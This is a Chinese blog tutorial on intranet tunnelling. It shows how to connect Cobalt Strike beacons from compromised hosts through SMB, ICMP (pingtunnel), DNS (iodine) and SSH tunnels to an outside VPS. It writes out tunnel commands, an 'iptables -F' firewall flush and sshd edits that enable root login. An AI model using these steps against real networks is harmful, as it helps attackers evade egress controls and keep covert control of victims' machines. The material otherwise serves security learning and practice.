【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议

 

前言:

介绍: 

博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。

擅长:对于技术、工具、漏洞原理、黑产打击的研究。

C站缘:C站的前辈,引领我度过了一个又一个技术的瓶颈期、迷茫期。


导读:

面向读者:对于网络安全方面的学者。 

本文知识点(读者自测): 

(1)常用的上线方法(√)

(2)上线工具的使用(√)

 让读者如虎添翼

内网博文 目标 状态
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件 学会cs的基本使用方法、以及插件 已发布
【内网安全-基础】基础知识、信息收集、工具 基础知识、基础常规信息收集(命令、工具等) 已发布
【内网安全-防火墙】防火墙、协议、策略 防护墙的基础知识、出入站策略等 已发布
【内网安全-通讯&上线】通讯&上线基础知识 基础知识、通讯、上线、代理 已发布
【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议 常用的上线方法、上线工具使用 已发布
隧道搭建、穿透上线 2023将继续更新,敬请期待 ——
横向移动 2023将继续更新,敬请期待 ——
权限维持 2023将继续更新,敬请期待 ——
靶场练习 2023将继续更新,敬请期待 ——


目录

一、基础知识

二、隧道技术

1、简介:

2、SMB隧道

3、ICMP隧道

4、DNS隧道

5、SSH协议

6、控制上线-插件


一、基础知识

【内网安全-基础】基础知识、信息收集、工具https://blog.csdn.net/qq_53079406/article/details/128292587?spm=1001.2014.3001.5501【内网安全-防火墙】防火墙、协议、策略https://blog.csdn.net/qq_53079406/article/details/128314938?spm=1001.2014.3001.5501【内网安全-通讯&上线】通讯&上线基础知识https://blog.csdn.net/qq_53079406/article/details/128320574?spm=1001.2014.3001.5501

二、隧道技术

1、简介:

1)是路由器把一种网络层协议封装到另一个协议中以跨过网络传送到另一个路由器的处理过程

————

2)隧道技术是一种数据包封装技术,它是将原始IP包(其报头包含原始发送者和最终目的地)封装在另一个数据包(称为封装的IP包)的数据净荷中进行传输

————

3)隧道技术上线:
HTTP/S & DNS & SSH & ICMP & SMB & 协议穿透等
除去SMB隧道外,其他隧道技术大部分针对的出站策略绕过(也就是最终传输的地方会转会原本的协议)


2、SMB隧道

1)SMB(全称是Server Message Block)是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通

#判断:445端口

————

2)上线条件

1、目标主机(SMB Beacon)接受 445 端口连接(因此445端口成为判断能否使用的方法)
2、Beacon只能链接由同一个 CS生成的
3、具有管理员权限或管理员凭据

————

3)使用(工具cs)

1、创建SMB Beacon 监听器、生成木马

(用Windows可执行程序E,这里我试了试没用过的选项,stageless意为没有舞台)

【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议_第1张图片

【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议_第2张图片

【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议_第3张图片
2、派生会话SMB Beacon(右键选中HTTP监听器上线的主机,进入Beacon控制台,输入spawn加SMB Beacon的监听器名称)

(预计process为rundll32.exe的主机会派生会话)

【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议_第4张图片

 (结果:新产生一个process为beacon.exe的派生会话)


3、注入进程上线SMB Beacon(将SMB Beacon注入到某个进程中;右键--目标--进程列表--Inject--选中Beacon)

(预计最后SMB Beacon,process会变为phpstudy的进程 )

【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议_第5张图片

开了phpstudy做测试

【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议_第6张图片

 (结果新产生了一个process为beacon.exe的)【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议_第7张图片


3、ICMP隧道

1)ICMP隧道技术是一种数据包封装技术,它是将原始IP包封装在ICMP的数据净荷中进行传输(传到接收方的时候,再变回Tcp)

#判断:ping命令(ping命令waf、防火墙不屏蔽情况下可以穿透)

————

2)在ICMP通信协议中,通信双方不需要开放端口( ping 命令)

————

3)ICMP协议项目:
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel

————
4)使用:

VPS:
./pingtunnel -type server

(出现问题: ./ping 隧道: 拒绝许可)
肉鸡:
管理器运行(ICMP程序)
pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1(此处,监听本地6666端口,并转发到指定ip的7777端口)
 ——
CS:
监听器1:127.0.0.1 6666
监听器2:192.168.46.66 7777
生成监听器1的Stager后门肉鸡执行


4、DNS隧道

1)DNS:为了访问互联网和内网资源,DNS提供域名解析服务,将域名和IP地址进行转换

————

2)DNS隧道是将其他协议的内容封装在DNS协议中,然后以DNS请求和响应包完成传输数据(通信)的技术。当前网络世界中的DNS是一项必不可少的服务,所以防火墙和入侵检测设备将很难做到完全过滤掉DNS流量
#判断:nslookup dig

————

#工具:https://github.com/yarrick/iodine

iodine原理:通过TAP虚拟网卡,在服务端建立起一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网。在客户端和服务端之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡

————

3)上线条件:

1、内网主机出网DNS协议数据
2、域名申请及配置
3、监听器创建及配置
4、后门绑定监听器及生成

————

4)上线:
1、内网主机出网DNS协议数据(解决通讯)
工具:https://github.com/yarrick/iodine
判断出网:nslookup www.baidu.com

——

2、服务器:设置密码并创建虚拟IP及绑定域名指向
iodined -f -c -P 密码 192.168.0.1 ns1.域名 -DD
设置密码并创建虚拟IP及绑定域名指向

——

3、客户端:连接密码并绑定域名指向
iodine -f -M 200 -P 密码 ns1.域名
-尝试通讯尝试连接:
ssh [email protected]


5、SSH协议

1)安全外壳协议(Secure Shell,简称SSH)是一种在不安全网络上用于安全远程登录和其他安全网络服务的协议

————

2)CS无SSH协议监听器配置,无法上线

————

3)通讯(SSH协议存在于Linux系统,跳板机必须Linux):

iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */

开启ssh协议登录:
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart
本地:出站封
ssh -CfNg -L 1122:192.168.1.15:8080 [email protected]
curl http://127.0.0.1:1122
远程:入站封
ssh -CfNg -R 1234:192.168.1.15:8080 root@IP地址
curl http://127.0.0.1:1234


6、控制上线-插件

https://github.com/gloxec/CrossC2

面向Linux Mac IOS Android系统上线支持

————

目前版本只支持反向的https和正向的tcp
1、下载对应版本加载器和CNA插件
2、上传加载器文件和本地加载CNA插件
3、修改CNA插件配置路径及上传Key文件
4、使用命令或插件绑定HTTPS监听器生成



网络安全三年之约

First year 

掌握各种原理、不断打新的靶场

目标:edusrc、cnvd 

主页 | 教育漏洞报告平台 (sjtu.edu.cn)https://src.sjtu.edu.cn/https://www.cnvd.org.cnhttps://www.cnvd.org.cn/


second year 

不断学习、提升技术运用技巧,研究各种新平台

开始建立自己的渗透体系

目标:众测平台、企业src应急响应中心 

众测平台 URL
漏洞盒子 漏洞盒子 | 互联网安全测试众测平台
火线安全平台 火线安全平台
漏洞银行 BUGBANK 官方网站 | 领先的网络安全漏洞发现品牌 | 开放安全的提出者与倡导者 | 创新的漏洞发现平台
360漏洞众包响应平台 360漏洞云漏洞众包响应平台
补天平台(奇安信) 补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC
春秋云测 首页
雷神众测(可信众测,安恒) 雷神众测 - BountyTeam
云众可信(启明星辰) 云众可信 - 互联网安全服务引领者
ALLSEC ALLSEC
360众测 360众测平台
看雪众测(物联网) https://ce.kanxue.com/
CNVD众测平台 网络安全众测平台
工控互联网安全测试平台 CNCERT工业互联网安全测试平台
慢雾(区块链) Submit Bug Bounty - SlowMist Zone - Blockchain Ecosystem Security Zone
平安汇聚 http://isrc.pingan.com/homePage/index

互联网大厂 URL
阿里 https://asrc.alibaba.com/#/
腾讯 https://security.tencent.com/
百度 https://bsrc.baidu.com/v2/#/home
美团 https://security.meituan.com/#/home
360 https://security.360.cn/
网易 https://aq.163.com/
字节跳动 https://security.bytedance.com/
京东 https://security.jd.com/#/
新浪 http://sec.sina.com.cn/
微博 https://wsrc.weibo.com/
搜狗 http://sec.sogou.com/
金山办公 https://security.wps.cn/
有赞 https://src.youzan.com/


Third Year 

学习最新的知识,建全自己的渗透体系

目标:参与护网(每一个男孩子心中的梦想) 

时间:一般5月面试,6/7月开始(持续2-3周)

分类:国家级护网、省级护网、市级护网、重大节日护网(如:建党、冬奥等)

你可能感兴趣的:(0X09【内网安全】,安全,网络)